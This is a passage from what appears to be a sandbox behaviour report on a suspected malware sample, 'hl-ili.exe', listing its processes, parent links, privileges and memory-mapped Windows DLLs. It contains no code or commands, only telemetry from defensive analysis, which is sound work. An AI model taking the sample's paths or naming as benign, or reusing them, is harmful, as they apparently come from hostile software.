"c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 18804 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 18805 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 18806 start_va = 0x75bf0000 end_va = 0x76feefff monitored = 0 entry_point = 0x75dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 18807 start_va = 0x74b20000 end_va = 0x74b56fff monitored = 0 entry_point = 0x74b23b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 18808 start_va = 0x75600000 end_va = 0x75af8fff monitored = 0 entry_point = 0x75807610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 18809 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 18810 start_va = 0x773b0000 end_va = 0x773f3fff monitored = 0 entry_point = 0x773b7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 18811 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 18812 start_va = 0x75280000 end_va = 0x752ddfff monitored = 0 entry_point = 0x75297470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 18813 start_va = 0x77970000 end_va = 0x77982fff monitored = 0 entry_point = 0x77971d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 18814 start_va = 0x75b00000 end_va = 0x75beafff monitored = 0 entry_point = 0x75b3d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Thread: id = 138 os_tid = 0x38c Thread: id = 146 os_tid = 0xdd4 Process: id = "18" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x69e5b000" os_pid = "0xc3c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18473 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18474 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18475 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18476 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18477 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18478 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18479 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18480 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18481 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18482 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18483 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18484 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18485 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18486 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18487 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18540 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18541 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18542 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18543 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18544 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18560 start_va = 0x4a0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 18737 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18753 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 18754 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18755 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 18756 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18757 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18758 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18759 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 18760 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 18761 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 18762 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 18763 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 18764 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 18765 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 18766 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 18767 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 18768 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Thread: id = 139 os_tid = 0x1298 Process: id = "19" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x63360000" os_pid = "0x13c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18494 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18495 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18496 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18497 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18498 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18499 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18500 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18501 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18502 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18503 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18504 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18505 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18506 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18507 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18508 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18576 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 18577 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18578 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18579 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18580 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18596 start_va = 0x4a0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 18597 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18782 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 18783 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18784 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 18785 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18786 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 18787 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18788 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 18789 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 18790 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 18791 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 18792 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 18793 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 18794 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 18795 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Thread: id = 140 os_tid = 0x11d4 Process: id = "20" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x3e365000" os_pid = "0x13c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18525 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18526 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18527 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18528 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18529 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18530 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18531 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18532 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18533 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18534 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18535 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18536 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18537 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18538 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18539 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18692 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 18693 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18694 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18695 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18696 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18697 start_va = 0x5b0000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 18713 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18714 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Thread: id = 142 os_tid = 0x1294 Process: id = "21" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x6966a000" os_pid = "0xc30" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18545 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18546 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18547 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18548 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18549 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18550 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18551 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18552 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18553 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18554 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18555 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18556 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18557 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18558 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18559 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18715 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 18716 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18717 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18733 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = 